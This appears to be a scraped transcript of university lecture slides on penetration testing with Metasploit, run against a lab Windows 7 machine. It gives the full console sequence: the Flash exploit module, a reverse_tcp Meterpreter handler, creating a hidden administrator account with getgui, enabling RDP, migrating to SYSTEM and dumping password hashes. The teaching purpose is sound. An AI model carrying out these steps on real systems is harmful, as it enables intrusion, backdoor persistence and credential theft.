Metasploit Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework. Define the options and payloads required to generate and use vulnerabilities. Gaining remote access. Prof Bill Buchanan http://asecuritysite.com @billatnapier
16
Embed
Metasploit - asecuritysite.com · Metasploit x Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework . x Define the options and …
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Metasploit Understand how a Pen Tester can generate vulnerabilities and test
using the Metasploit framework.
Define the options and payloads required to generate and use
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/adobe_flash_pixel_bender_bof 2014-04-28 normal Adobe Flash Player Shader Buffer Overflow
msf > info exploit/windows/browser/adobe_flash_pixel_bender_bof Name: Adobe Flash Player Shader Buffer Overflow Module: exploit/windows/browser/adobe_flash_pixel_bender_bof Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2014-04-28
Available targets: Id Name -- ---- 0 Automatic
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Retries false no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate URIPATH no The URI to use for this exploit (default is random)
Payload information: Space: 2000
Description: This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8.
msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 10.200.0.208LHOST => 10.200.0.208msf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > exploit
[*] Started reverse handler on 10.200.0.208:4444 [*] Starting the payload handler...[*] Sending stage (770048 bytes) to 10.200.0.205[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500
meterpreter > sysinfoComputer : ENCASE-PC1OS : Windows 7 (Build 7601, Service Pack 1).Architecture : x64 (Current Process is WOW64)System Language : en_GBMeterpreter : x86/win32
meterpreter > run getgui -u newuser -p pass[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez [email protected][*] Setting user account for logon[*] Adding User: hacker with Password: s3cr3t[*] Hiding user from Windows Login screen[*] Adding User: hacker to local group 'Remote Desktop Users'[*] Adding User: hacker to local group 'Administrators'[*] You can now login with the created user[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez [email protected][*] Enabling Remote Desktop[*] RDP is disabled; enabling it ...[*] Setting Terminal Services service startup mode[*] The Terminal Services service is not set to auto, changing it to auto ...[*] Opening port in local firewall if necessary[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc
meterpreter > hashdump[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.meterpreter > getuidServer username: Encase-PC1\Encase
meterpreter > ps
Process List============
PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 264 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 364 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 372 364 csrss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 388 524 spoolsv.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 420 364 wininit.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe 524 420 services.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe 532 420 lsass.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 540 420 lsm.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe 632 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
708 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 788 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 832 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 856 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
meterpreter > migrate 832[*] Migrating from 2436 to 832...[*] Migration completed successfully.meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WINEXP.EXE
Metasploit Understand how a Pen Tester can generate vulnerabilities and test
using the Metasploit framework.
Define the options and payloads required to generate and use
vulnerabilities.
Understand how to test a range of devices/instances.